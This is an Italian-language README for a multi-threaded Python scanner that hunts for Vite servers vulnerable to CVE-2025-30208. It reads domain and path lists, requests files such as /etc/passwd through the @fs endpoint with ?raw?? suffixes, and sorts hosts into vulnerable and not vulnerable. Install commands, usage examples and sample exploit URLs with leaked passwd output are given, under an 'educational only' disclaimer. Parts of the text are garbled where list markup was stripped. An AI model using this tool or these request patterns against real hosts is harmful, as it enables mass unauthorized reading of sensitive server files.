
CVE-2025-30208 ViteVulnScanner
Ehi, questo è un fantastico script Python multi-thread di keklick1337 per dare la caccia ai domini vulnerabili a CVE-2025-30208 in Vite. In pratica, controlla se riesci a ottenere file casuali tramite l'endpoint @fs con ?raw?? o ?import&raw?? — tipo /etc/passwd e altre cose interessanti. Ha un filtraggio intelligente dei falsi positivi per non perdere tempo con schifezze, più opzioni per personalizzare l'output.
<head> e <body> a meno che non sembri legittimo.sourcemappingurl o export default per confermare la roba buona.results_good.txt, results_maybe_good.txt, results_bad.txt).-u se ti piace.requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt: Percorsi da controllare, uno per riga (es. /etc/passwd).domains.txt: Domini da colpire, uno per riga (es. example.com).Lancialo così:
python3 CVE-2025-30208.py <file_domini> [opzioni]
<file_domini>: Il tuo elenco di domini (niente file, niente scansione, ovvio).-t, --threads: Quanti thread scatenare (default: 10).-p, --protocol: Forza http o https, o salta per entrambi.-u, --urls: Aggiungi gli URL vulnerabili nell'output.-o, --output: Nome base per i file (default: results).-f, --format: txt per file separati o jsonl per un singolo file enorme (default: txt).python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt: Roba che è sicuramente fottuta (ha sourcemappingurl o export default).results_maybe_good.txt: Potrebbe essere vulnerabile, ma nessuna prova certa.results_bad.txt: Pulito, nessun problema.-u e gli URL vengono attaccati con un tab (\t).results_good.txt con -u:example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl, results_maybe_good.jsonl, results_bad.jsonl.domain: Cosa hai scansionato.status: VULNERABLE, MAYBE VULNERABLE o BAD.url (se -u): Dove è fottuto.response: Cosa ha sputato il server.results_good.jsonl:{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake).<head> e <body>, è un no — il server sta solo facendo lo stronzo.path_list.txt con @fs/<path>?raw?? e ?import&raw??.<head> e <body>? Salta quella schifezza.sourcemappingurl o export default? Boom, GOOD.MAYBE_GOOD.urllib3.disable_warnings()), quindi non si lamenta dei certificati. Stai attento.path_list.txt per i tuoi obiettivi — i file sensibili sono roba seria.Ascolta: questa roba è solo a scopo educativo, fratello. Non sono responsabile se combini casini, vieni beccato o fai incazzare qualcuno con questo. Usalo per imparare, non per fare lo scemo. Tutti i rischi sono tuoi, nahuy — io sono solo qui a lasciare codice.
Hai idee? Trovato un bug? Contattami con issue o pull request. Più modi per eliminare i falsi positivi o funzionalità fighissime? Rendiamo questa bestia ancora più potente.
BAD.